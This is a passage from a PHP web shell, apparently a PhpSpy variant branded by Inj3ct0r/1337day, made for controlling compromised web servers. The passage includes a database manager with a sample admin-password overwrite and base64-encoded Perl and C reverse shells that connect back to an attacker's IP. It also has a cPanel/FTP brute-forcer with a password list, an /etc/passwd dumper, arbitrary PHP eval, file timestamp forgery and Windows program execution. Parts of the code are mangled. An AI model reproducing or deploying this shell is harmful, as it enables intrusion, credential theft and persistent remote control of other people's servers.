    p('<h2>Downl0ad File</h2>');
        
    p('<p>File: <input class="input" name="mysqldlfile" size="115" type="text" /> <a href="javascript:mysqlfile(\'mysqldown\');">Downl0ad</a></p>');
        
    makehide('dbhost');
        
    makehide('dbport');
        
    makehide('dbuser');
        
    makehide('dbpass');
        
    makehide('dbname');
        
    makehide('charset');
        
    makehide('doing');
        
    makehide('action','sqlfile');
        
    p('</form>');
    }

    elseif (
    $action == 'sqladmin') {
        !
    $dbhost && $dbhost 'localhost';
        !
    $dbuser && $dbuser 'inj3ct0r_root';
        !
    $dbport && $dbport '3306';
        
    $dbform '<input type="hidden" id="connect" name="connect" value="1" />';
        if(isset(
    $dbhost)){
            
    $dbform .= "<input type=\"hidden\" id=\"dbhost\" name=\"dbhost\" value=\"$dbhost\" />\n";
        }
        if(isset(
    $dbuser)) {
            
    $dbform .= "<input type=\"hidden\" id=\"dbuser\" name=\"dbuser\" value=\"$dbuser\" />\n";
        }
        if(isset(
    $dbpass)) {
            
    $dbform .= "<input type=\"hidden\" id=\"dbpass\" name=\"dbpass\" value=\"$dbpass\" />\n";
        }
        if(isset(
    $dbport)) {
            
    $dbform .= "<input type=\"hidden\" id=\"dbport\" name=\"dbport\" value=\"$dbport\" />\n";
        }
        if(isset(
    $dbname)) {
            
    $dbform .= "<input type=\"hidden\" id=\"dbname\" name=\"dbname\" value=\"$dbname\" />\n";
        }
        if(isset(
    $charset)) {
            
    $dbform .= "<input type=\"hidden\" id=\"charset\" name=\"charset\" value=\"$charset\" />\n";
        }

        if (
    $doing == 'backupmysql' && $saveasfile) {
            if (!
    $table) {
                
    m('Please choose the table');
            } else {
                
    dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
                
    $table array_flip($table);
                
    $fp = @fopen($path,'w');
                if (
    $fp) {
                    
    $result q('SHOW tables');
                    if (!
    $resultp('<h2>'.mysql_error().'</h2>');
                    
    $mysqldata '';
                    while (
    $currow mysql_fetch_array($result)) {
                        if (isset(
    $table[$currow[0]])) {
                            
    sqldumptable($currow[0], $fp);
                        }
                    }
                    
    fclose($fp);
                    
    $fileurl str_replace(SA_ROOT,'',$path);
                    
    m('Database has success backup to <a href="'.$fileurl.'" rel="nofollow" target="_blank">'.$path.'</a>');
                    
    mysql_close();
                } else {
                    
    m('Backup failed');
                }
            }
        }
        if (
    $insert && $insertsql) {
            
    $keystr $valstr $tmp '';
            foreach(
    $insertsql as $key => $val) {
                if (
    $val) {
                    
    $keystr .= $tmp.$key;
                    
    $valstr .= $tmp."'".addslashes($val)."'";
                    
    $tmp ',';
                }
            }
            if (
    $keystr && $valstr) {
                
    dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
                
    m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ? 'Insert new record of success' mysql_error());
            }
        }
        if (
    $update && $insertsql && $base64) {
            
    $valstr $tmp '';
            foreach(
    $insertsql as $key => $val) {
                
    $valstr .= $tmp.$key."='".addslashes($val)."'";
                
    $tmp ',';
            }
            if (
    $valstr) {
                
    $where base64_decode($base64);
                
    dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
                
    m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1") ? 'Record updating' mysql_error());
            }
        }
        if (
    $doing == 'del' && $base64) {
            
    $where base64_decode($base64);
            
    $delete_sql "DELETE FROM $tablename WHERE $where";
            
    dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
            
    m(q("DELETE FROM $tablename WHERE $where") ? 'Deletion record of success' mysql_error());
        }

        if (
    $tablename && $doing == 'drop') {
            
    dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
            if (
    q("DROP TABLE $tablename")) {
                
    m('Drop table of success');
                
    $tablename '';
            } else {
                
    m(mysql_error());
            }
        }

        
    $charsets = array(''=>'Default','gbk'=>'GBK''big5'=>'Big5''utf8'=>'UTF-8''latin1'=>'Latin1');

        
    formhead(array('title'=>'MySql Dump Database'));
        
    makehide('action','sqladmin');
        
    p('<p>');
        
    p('DBHost:');
        
    makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
        
    p(':');
        
    makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
        
    p('DBUser:');
        
    makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
        
    p('DBPass:');
        
    makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
        
    p('DBCharset:');
        
    makeselect(array('name'=>'charset','option'=>$charsets,'selected'=>$charset));
        
    makeinput(array('name'=>'connect','value'=>'Connect','type'=>'submit','class'=>'bt'));
        
    p('</p>');
        
    formfoot();
    ?>
    <script type="text/javascript">
    function editrecord(action, base64, tablename){
        if (action == 'del') {
            if (!confirm('Is or isn\'t deletion record?')) return;
        }
        $('recordlist').doing.value=action;
        $('recordlist').base64.value=base64;
        $('recordlist').tablename.value=tablename;
        $('recordlist').submit();
    }
    function moddbname(dbname) {
        if(!dbname) return;
        $('setdbname').dbname.value=dbname;
        $('setdbname').submit();
    }
    function settable(tablename,doing,page) {
        if(!tablename) return;
        if (doing) {
            $('settable').doing.value=doing;
        }
        if (page) {
            $('settable').page.value=page;
        }
        $('settable').tablename.value=tablename;
        $('settable').submit();
    }
    </script>
    <?php
        
    // SQL
        
    formhead(array('name'=>'recordlist'));
        
    makehide('doing');
        
    makehide('action','sqladmin');
        
    makehide('base64');
        
    makehide('tablename');
        
    p($dbform);
        
    formfoot();

        
    // Data
        
    formhead(array('name'=>'setdbname'));
        
    makehide('action','sqladmin');
        
    p($dbform);
        if (!
    $dbname) {
            
    makehide('dbname');
        }
        
    formfoot();


        
    formhead(array('name'=>'settable'));
        
    makehide('action','sqladmin');
        
    p($dbform);
        
    makehide('tablename');
        
    makehide('page',$page);
        
    makehide('doing');
        
    formfoot();

        
    $cachetables = array();
        
    $pagenum 30;
        
    $page intval($page);
        if(
    $page) {
            
    $start_limit = ($page 1) * $pagenum;
        } else {
            
    $start_limit 0;
            
    $page 1;
        }
        if (isset(
    $dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) {
            
    dbconn($dbhost$dbuser$dbpass$dbname$charset$dbport);
            
    // get mysql server
            
    $mysqlver mysql_get_server_info();
            
    p('<p>MySQL '.$mysqlver.' running in '.$dbhost.' as '.$dbuser.'@'.$dbhost.'</p>');
            
    $highver $mysqlver '4.1' 0;

            
    // Show database
            
    $query q("SHOW DATABASES");
            
    $dbs = array();
            
    $dbs[] = '-- Select a database --';
            while(
    $db mysql_fetch_array($query)) {
                
    $dbs[$db['Database']] = $db['Database'];
            }
            
    makeselect(array('title'=>'Please select a database:','name'=>'db[]','option'=>$dbs,'selected'=>$dbname,'onchange'=>'moddbname(this.options[this.selectedIndex].value)','newline'=>1));
            
    $tabledb = array();
            if (
    $dbname) {
                
    p('<p>');
                
    p('Current dababase: <a href="javascript:moddbname(\''.$dbname.'\');">'.$dbname.'</a>');
                if (
    $tablename) {
                    
    p(' | Current Table: <a href="javascript:settable(\''.$tablename.'\');">'.$tablename.'</a> [ <a href="javascript:settable(\''.$tablename.'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$tablename.'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$tablename.'\', \'drop\');">Drop</a> ]');
                }
                
    p('</p>');
                
    mysql_select_db($dbname);

                
    $getnumsql '';
                
    $runquery 0;
                if (
    $sql_query) {
                    
    $runquery 1;
                }
                
    $allowedit 0;
                if (
    $tablename && !$sql_query) {
                    
    $sql_query "SELECT * FROM $tablename";
                    
    $getnumsql $sql_query;
                    
    $sql_query $sql_query." LIMIT $start_limit$pagenum";
                    
    $allowedit 1;
                }
                
    p('<form action="'.$self.'" method="POST">');
                
    p('<p><table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td colspan="2">Run SQL query/queries on database <font color=red><b>'.$dbname.'</font></b>:<BR>Example VBB Password: <font color=red>Inj3ct0r Team</font><BR><font color=yellow>UPDATE `user` SET `password` = \'69e53e5ab9536e55d31ff533aefc4fbe\', salt = \'p5T\' WHERE `userid` = \'1\' </font>
                </td></tr><tr><td><textarea name="sql_query" class="area" style="width:600px;height:50px;overflow:auto;">'
    .htmlspecialchars($sql_query,ENT_QUOTES).'</textarea></td><td style="padding:0 5px;"><input class="bt" style="height:50px;" name="submit" type="submit" value="Query" /></td></tr></table></p>');
                
    makehide('tablename'$tablename);
                
    makehide('action','sqladmin');
                
    p($dbform);
                
    p('</form>');
                if (
    $tablename || ($runquery && $sql_query)) {
                    if (
    $doing == 'structure') {
                        
    $result q("SHOW COLUMNS FROM $tablename");
                        
    $rowdb = array();
                        while(
    $row mysql_fetch_array($result)) {
                            
    $rowdb[] = $row;
                        }
                        
    p('<table border="0" cellpadding="3" cellspacing="0">');
                        
    p('<tr class="head">');
                        
    p('<td>Field</td>');
                        
    p('<td>Type</td>');
                        
    p('<td>Null</td>');
                        
    p('<td>Key</td>');
                        
    p('<td>Default</td>');
                        
    p('<td>Extra</td>');
                        
    p('</tr>');
                        foreach (
    $rowdb as $row) {
                            
    $thisbg bg();
                            
    p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
                            
    p('<td>'.$row['Field'].'</td>');
                            
    p('<td>'.$row['Type'].'</td>');
                            
    p('<td>'.$row['Null'].'&nbsp;</td>');
                            
    p('<td>'.$row['Key'].'&nbsp;</td>');
                            
    p('<td>'.$row['Default'].'&nbsp;</td>');
                            
    p('<td>'.$row['Extra'].'&nbsp;</td>');
                            
    p('</tr>');
                        }
                        
    tbfoot();
                    } elseif (
    $doing == 'insert' || $doing == 'edit') {
                        
    $result q('SHOW COLUMNS FROM '.$tablename);
                        while (
    $row mysql_fetch_array($result)) {
                            
    $rowdb[] = $row;
                        }
                        
    $rs = array();
                        if (
    $doing == 'insert') {
                            
    p('<h2>Insert new line in '.$tablename.' table &raquo;</h2>');
                        } else {
                            
    p('<h2>Update record in '.$tablename.' table &raquo;</h2>');
                            
    $where base64_decode($base64);
                            
    $result q("SELECT * FROM $tablename WHERE $where LIMIT 1");
                            
    $rs mysql_fetch_array($result);
                        }
                        
    p('<form method="post" action="'.$self.'">');
                        
    p($dbform);
                        
    makehide('action','sqladmin');
                        
    makehide('tablename',$tablename);
                        
    p('<table border="0" cellpadding="3" cellspacing="0">');
                        foreach (
    $rowdb as $row) {
                            if (
    $rs[$row['Field']]) {
                                
    $value htmlspecialchars($rs[$row['Field']]);
                            } else {
                                
    $value '';
                            }
                            
    $thisbg bg();
                            
    p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
                            
    p('<td><b>'.$row['Field'].'</b><br />'.$row['Type'].'</td><td><textarea class="area" name="insertsql['.$row['Field'].']" style="width:500px;height:60px;overflow:auto;">'.$value.'</textarea></td></tr>');
                        }
                        if (
    $doing == 'insert') {
                            
    p('<tr class="fout"><td colspan="2"><input class="bt" type="submit" name="insert" value="Insert" /></td></tr>');
                        } else {
                            
    p('<tr class="fout"><td colspan="2"><input class="bt" type="submit" name="update" value="Update" /></td></tr>');
                            
    makehide('base64'$base64);
                        }
                        
    p('</table></form>');
                    } else {
                        
    $querys = @explode(';',$sql_query);
                        foreach(
    $querys as $num=>$query) {
                            if (
    $query) {
                                
    p("<p><b>Query#{$num} : ".htmlspecialchars($query,ENT_QUOTES)."</b></p>");
                                switch(
    qy($query))
                                {
                                    case 
    0:
                                        
    p('<h2>Error : '.mysql_error().'</h2>');
                                        break;
                                    case 
    1:
                                        if (
    strtolower(substr($query,0,13)) == 'select * from') {
                                            
    $allowedit 1;
                                        }
                                        if (
    $getnumsql) {
                                            
    $tatol mysql_num_rows(q($getnumsql));
                                            
    $multipage multi($tatol$pagenum$page$tablename);
                                        }
                                        if (!
    $tablename) {
                                            
    $sql_line str_replace(array("\r""\n""\t"), array(' '' '' '), trim(htmlspecialchars($query)));
                                            
    $sql_line preg_replace("/\/\*[^(\*\/)]*\*\//i"" "$sql_line);
                                            
    preg_match_all("/from\s+`{0,1}([\w]+)`{0,1}\s+/i",$sql_line,$matches);
                                            
    $tablename $matches[1][0];
                                        }
                                        
    $result q($query);
                                        
    p($multipage);
                                        
    p('<table border="0" cellpadding="3" cellspacing="0">');
                                        
    p('<tr class="head">');
                                        if (
    $alloweditp('<td>Action</td>');
                                        
    $fieldnum = @mysql_num_fields($result);
                                        for(
    $i=0;$i<$fieldnum;$i++){
                                            
    $name = @mysql_field_name($result$i);
                                            
    $type = @mysql_field_type($result$i);
                                            
    $len = @mysql_field_len($result$i);
                                            
    p("<td nowrap>$name<br><span>$type($len)</span></td>");
                                        }
                                        
    p('</tr>');
                                        while(
    $mn = @mysql_fetch_assoc($result)){
                                            
    $thisbg bg();
                                            
    p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
                                            
    $where $tmp $b1 '';
                                            foreach(
    $mn as $key=>$inside){
                                                if (
    $inside) {
                                                    
    $where .= $tmp.$key."='".addslashes($inside)."'";
                                                    
    $tmp ' AND ';
                                                }
                                                
    $b1 .= '<td nowrap>'.html_clean($inside).'&nbsp;</td>';
                                            }
                                            
    $where base64_encode($where);
                                            if (
    $alloweditp('<td nowrap><a href="javascript:editrecord(\'edit\', \''.$where.'\', \''.$tablename.'\');">Edit</a> | <a href="javascript:editrecord(\'del\', \''.$where.'\', \''.$tablename.'\');">Del</a></td>');
                                            
    p($b1);
                                            
    p('</tr>');
                                            unset(
    $b1);
                                        }
                                        
    tbfoot();
                                        
    p($multipage);
                                        break;
                                    case 
    2:
                                        
    $ar mysql_affected_rows();
                                        
    p('<h2>affected rows : <b>'.$ar.'</b></h2>');
                                        break;
                                }
                            }
                        }
                    }
                } else {
                    
    $query q("SHOW TABLE STATUS");
                    
    $table_num $table_rows $data_size 0;
                    
    $tabledb = array();
                    while(
    $table mysql_fetch_array($query)) {
                        
    $data_size $data_size $table['Data_length'];
                        
    $table_rows $table_rows $table['Rows'];
                        
    $table['Data_length'] = sizecount($table['Data_length']);
                        
    $table_num++;
                        
    $tabledb[] = $table;
                    }
                    
    $data_size sizecount($data_size);
                    unset(
    $table);
                    
    p('<table border="0" cellpadding="0" cellspacing="0">');
                    
    p('<form action="'.$self.'" method="POST">');
                    
    makehide('action','sqladmin');
                    
    p($dbform);
                    
    p('<tr class="head">');
                    
    p('<td width="2%" align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td>');
                    
    p('<td>Name</td>');
                    
    p('<td>Rows</td>');
                    
    p('<td>Data_length</td>');
                    
    p('<td>Create_time</td>');
                    
    p('<td>Update_time</td>');
                    if (
    $highver) {
                        
    p('<td>Engine</td>');
                        
    p('<td>Collation</td>');
                    }
                    
    p('</tr>');
                    foreach (
    $tabledb as $key => $table) {
                        
    $thisbg bg();
                        
    p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
                        
    p('<td align="center" width="2%"><input type="checkbox" name="table[]" value="'.$table['Name'].'" /></td>');
                        
    p('<td><a href="javascript:settable(\''.$table['Name'].'\');">'.$table['Name'].'</a> [ <a href="javascript:settable(\''.$table['Name'].'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'drop\');">Drop</a> ]</td>');
                        
    p('<td>'.$table['Rows'].'</td>');
                        
    p('<td>'.$table['Data_length'].'</td>');
                        
    p('<td>'.$table['Create_time'].'</td>');
                        
    p('<td>'.$table['Update_time'].'</td>');
                        if (
    $highver) {
                            
    p('<td>'.$table['Engine'].'</td>');
                            
    p('<td>'.$table['Collation'].'</td>');
                        }
                        
    p('</tr>');
                    }
                    
    p('<tr class=fout>');
                    
    p('<td>&nbsp;</td>');
                    
    p('<td>Total tables: '.$table_num.'</td>');
                    
    p('<td>'.$table_rows.'</td>');
                    
    p('<td>'.$data_size.'</td>');
                    
    p('<td colspan="'.($highver 2).'">&nbsp;</td>');
                    
    p('</tr>');

                    
    p("<tr class=\"fout\"><td colspan=\"".($highver 6)."\"><input name=\"saveasfile\" value=\"1\" type=\"checkbox\" /> Save as file <input class=\"input\" name=\"path\" value=\"".SA_ROOT.$_SERVER['HTTP_HOST']."_MySQL.sql\" type=\"text\" size=\"60\" /> <input class=\"bt\" type=\"submit\" name=\"downrar\" value=\"Export selection table\" /></td></tr>");
                    
    makehide('doing','backupmysql');
                    
    formfoot();
                    
    p("</table>");
                    
    fr($query);
                }
            }
        }
        
    tbfoot();
        @
    mysql_close();
    }
    //end sql backup


    elseif ($action == 'backconnect') {
        !
    $yourip && $yourip $_SERVER['REMOTE_ADDR'];
        !
    $yourport && $yourport '12345';
        
    $usedb = array('perl'=>'perl','c'=>'c');

        
    $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
            
    "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
            
    "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
            
    "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
            
    "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
            
    "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
            
    "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
        
    $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC".
            
    "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb".
            
    "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd".
            
    "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ".
            
    "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC".
            
    "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D".
            
    "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp".
            
    "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";

        if (
    $start && $yourip && $yourport && $use){
            if (
    $use == 'perl') {
                
    cf('/tmp/angel_bc',$back_connect);
                
    $res execute(which('perl')." /tmp/angel_bc $yourip $yourport &");
            } else {
                
    cf('/tmp/angel_bc.c',$back_connect_c);
                
    $res execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c');
                @
    unlink('/tmp/angel_bc.c');
                
    $res execute("/tmp/angel_bc $yourip $yourport &");
            }
            
    m("Now script try connect to $yourip port $yourport ...");
        }

        
    formhead(array('title'=>'Back Connect'));
        
    makehide('action','backconnect');
        
    p('<p>');
        
    p('Your IP:');
        
    makeinput(array('name'=>'yourip','size'=>20,'value'=>$yourip));
        
    p('Your Port:');
        
    makeinput(array('name'=>'yourport','size'=>15,'value'=>$yourport));
        
    p('Use:');
        
    makeselect(array('name'=>'use','option'=>$usedb,'selected'=>$use));
        
    makeinput(array('name'=>'start','value'=>'Start','type'=>'submit','class'=>'bt'));
        
    p('</p>');
        
    formfoot();
    }
    //end backconnect window via NC

    // Brute
    elseif ($action == 'brute') {
    formhead(array('title'=>'Brute Forcer'));
        
    makehide('action','brute');
        
    makehide('dir',$brute);
    @
    ini_set('memory_limit'1000000000000);
    $connect_timeout=5;
    @
    set_time_limit(0);
    $submit $_REQUEST['submit'];
    $users $_REQUEST['users'];
    $pass $_REQUEST['passwords'];
    $target $_REQUEST['target'];
    $option $_REQUEST['option'];


    $passlist "0123456
    01234567
    012345678
    0123456789
    01234567890
    123456
    1234567
    12345678
    123456789
    1234567890
    111111
    000000
    222222
    333333
    444444
    555555
    666666
    777777
    888888
    999999
    123123
    456456
    789789
    123321
    456654
    654321
    7654321
    87654321
    987654321
    0987654321
    admin
    administrator
    admincp
    cpanel
    adminx
    admins
    password
    passwords
    passw0rd
    [email protected]
    [email protected]
    khongco
    25251325
    passw0rds"
    ;
    if(
    $target == ''){
    $target 'localhost';
    }
    print 
    " <div align='center'>
    <form method='post' style='border: 1px solid #000000'><br><br>
    <TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#966117 cellPadding=5 width='40%' bgColor=#303030 borderColorLight=#966117 border=1><tr><td>
    <b> Target  : </font><input type='text' name='target' size='16' value= 
    $target style='border: font-family:tahoma; font-weight:bold;'></p></font></b></p>
    <div align='center'><br>
    <TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#966117 cellPadding=5 width='50%' bgColor=#303030 borderColorLight=#966117 border=1>
    <tr>
    <td align='center'>
    <b>Username</b></td>
    <td>
    <p align='center'>
    <b>Password</b></td>
    </tr>
    </table>
    <p align='center'>
    <textarea rows='20' name='users' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>"
    ;
    $i 0;
    while (
    $i 60000) {

        
    $line posix_getpwuid($i);
        if (!empty(
    $line)) {

            while (list (
    $key$vba_etcpwd) = each($line)){
                echo 
    "".$vba_etcpwd."\n";
                break;
            }

        }

       
    $i++;
    }
    echo 
    "
    </textarea>
    <textarea rows='20' name='passwords' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>
    $passlist</textarea><br>
    <br>
    <b>Options : </span><input name='option' value='cpanel' style='font-weight: 700;' checked type='radio'> cPanel
    <input name='option' value='ftp' style='font-weight: 700;' type='radio'> ftp ==> <input type='submit' value='Attack' name='submit' ></p>
    </td></tr></table></td></tr></form><p align= 'left'>"
    ;
    ?>
    <?php
    function ftp_check($host,$user,$pass,$timeout){
    $ch curl_init();
    curl_setopt($chCURLOPT_URL"ftp://$host");
    curl_setopt($chCURLOPT_RETURNTRANSFER1);
    curl_setopt($chCURLOPT_HTTPAUTHCURLAUTH_BASIC);
    curl_setopt($chCURLOPT_FTPLISTONLY1);
    curl_setopt($chCURLOPT_USERPWD"$user:$pass");
    curl_setopt ($chCURLOPT_CONNECTTIMEOUT$timeout);
    curl_setopt($chCURLOPT_FAILONERROR1);
    $data curl_exec($ch);
    if ( 
    curl_errno($ch) == 28 ) {

    print 
    "<b> Error : Connection timed out , make confidence about validation of target !</b>";
    exit;}

    elseif ( 
    curl_errno($ch) == ){

    p("<b> submit[at]1337day.com # </b>
    <b> Attacking has been done! Username: <font color='#FF0000'> 
    $user </font> / Password:<font color='#FF0000'> $pass </font> => <a href=http://$user:$pass@$host:2082 rel="nofollow" target=_blank>Login</a></b><br>");
    }
    curl_close($ch);}

    function 
    cpanel_check($host,$user,$pass,$timeout){
    $ch curl_init();
    curl_setopt($chCURLOPT_URL"http://$host:2082");
    curl_setopt($chCURLOPT_RETURNTRANSFER1);
    curl_setopt($chCURLOPT_HTTPAUTHCURLAUTH_BASIC);
    curl_setopt($chCURLOPT_USERPWD"$user:$pass");
    curl_setopt ($chCURLOPT_CONNECTTIMEOUT$timeout);
    curl_setopt($chCURLOPT_FAILONERROR1);
    $data curl_exec($ch);
    if ( 
    curl_errno($ch) == 28 ) {
    print 
    "<b> Error : Connection timed out , make confidence about validation of target !</b>";
    exit;}
    elseif ( 
    curl_errno($ch) == ){

    p("<b> submit[at]1337day.com # </b><b>Attacking has been done!</a> Username: <font color='#FF0000'> $user </font> / Password:<font color='#FF0000'> $pass </font></b><br>");}curl_close($ch);}

    if(isset(
    $submit) && !empty($submit)){

    $userlist explode ("\n" $users );
    $passlist explode ("\n" $pass );
    p('<b>submit[at]1337day.com # Attacking ...</font></b><br>');
    foreach (
    $userlist as $user) {
    $_user trim($user);
    foreach (
    $passlist as $password ) {
    $_pass trim($password);
    if(
    $option == "ftp"){
    ftp_check($target,$_user,$_pass,$connect_timeout);
    }
    if (
    $option == "cpanel")
    {
    cpanel_check($target,$_user,$_pass,$connect_timeout);
    }
    }
    }
    }

        
    formfoot();
    }






    elseif (
    $action == 'etcpwd') {
    formhead(array('title'=>'Get /etc/passwd'));
        
    makehide('action','etcpwd');
        
    makehide('dir',$nowpath);
    $i 0;
     echo 
    "<p><br><textarea class=\"area\" id=\"phpcodexxx\" name=\"phpcodexxx\" cols=\"100\" rows=\"25\">";
    while (
    $i 60000) {

        
    $line posix_getpwuid($i);
        if (!empty(
    $line)) {

            while (list (
    $key$vba_etcpwd) = each($line)){
                echo 
    "".$vba_etcpwd."\n";
                break;
            }

        }

       
    $i++;
    }
      echo 
    "</textarea></p>";
        
    formfoot();
    }

    elseif (
    $action == 'eval') {
        
    $phpcode trim($phpcode);
        if(
    $phpcode){
            if (!
    preg_match('#<\?#si'$phpcode)) {
                
    $phpcode "<?php\n\n{$phpcode}\n\n?>";
            }
            eval(
    "?".">$phpcode<?");
        }
        
    formhead(array('title'=>'Eval PHP Code'));
        
    makehide('action','eval');
        
    maketext(array('title'=>'PHP Code','name'=>'phpcode''value'=>$phpcode));
        
    p('<p><a href="http://www.4ngel.net/phpspy/plugin/" rel="nofollow" target="_blank">Get plugins</a></p>');
        
    formfooter();
    }
    //end eval

    elseif ($action == 'editfile') {
        if(
    file_exists($opfile)) {
            
    $fp=@fopen($opfile,'r');
            
    $contents=@fread($fpfilesize($opfile));
            @
    fclose($fp);
            
    $contents=htmlspecialchars($contents);
        }
        
    formhead(array('title'=>'Create / Edit File'));
        
    makehide('action','file');
        
    makehide('dir',$nowpath);
        
    makeinput(array('title'=>'','name'=>'editfilename','value'=>$opfile,'newline'=>1));
        
    maketext(array('title'=>'File Content','name'=>'filecontent','value'=>$contents));
        
    formfooter();
    }
    //end editfile

    elseif ($action == 'newtime') {
        
    $opfilemtime = @filemtime($opfile);
        
    //$time = strtotime("$year-$month-$day $hour:$minute:$second");
        
    $cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12);
        
    formhead(array('title'=>''));
        
    makehide('action','file');
        
    makehide('dir',$nowpath);
        
    makeinput(array('title'=>'Alter file','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
        
    makeinput(array('title'=>'Reference file (fullpath)','name'=>'tarfile','size'=>120,'newline'=>1));
        
    formfooter();
        
    formhead(array('title'=>'Set last m0dified'));
        
    makehide('action','file');
        
    makehide('dir',$nowpath);
        
    makeinput(array('title'=>'Current file (fullpath)','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
        
    p('<p>Instead &raquo;');
        
    p('year:');
        
    makeinput(array('name'=>'year','value'=>date('Y',$opfilemtime),'size'=>4));
        
    p('month:');
        
    makeinput(array('name'=>'month','value'=>date('m',$opfilemtime),'size'=>2));
        
    p('day:');
        
    makeinput(array('name'=>'day','value'=>date('d',$opfilemtime),'size'=>2));
        
    p('hour:');
        
    makeinput(array('name'=>'hour','value'=>date('H',$opfilemtime),'size'=>2));
        
    p('minute:');
        
    makeinput(array('name'=>'minute','value'=>date('i',$opfilemtime),'size'=>2));
        
    p('second:');
        
    makeinput(array('name'=>'second','value'=>date('s',$opfilemtime),'size'=>2));
        
    p('</p>');
        
    formfooter();
    }
    //end newtime

    elseif ($action == '*****') {
        if (
    IS_WIN && IS_COM) {
            if(
    $program && $parameter) {
                $*****= new 
    COM('*****.Application');
                
    $a = $*****->*****Execute($program,$parameter);
                
    m('Program run has '.(!$a 'success' 'fail'));
            }
            !
    $program && $program 'c:\windows\system32\cmd.exe';
            !
    $parameter && $parameter '/c net start > '.SA_ROOT.'log.txt';
            
    formhead(array('title'=>'Execute Program'));
            
    makehide('action','*****');
            
    makeinput(array('title'=>'Program','name'=>'program','value'=>$program,'newline'=>1));
            
    p('<p>');
            
    makeinput(array('title'=>'Parameter','name'=>'parameter','value'=>$parameter));
            
    makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
            
    p('</p>');
            
    formfoot();
        }
        
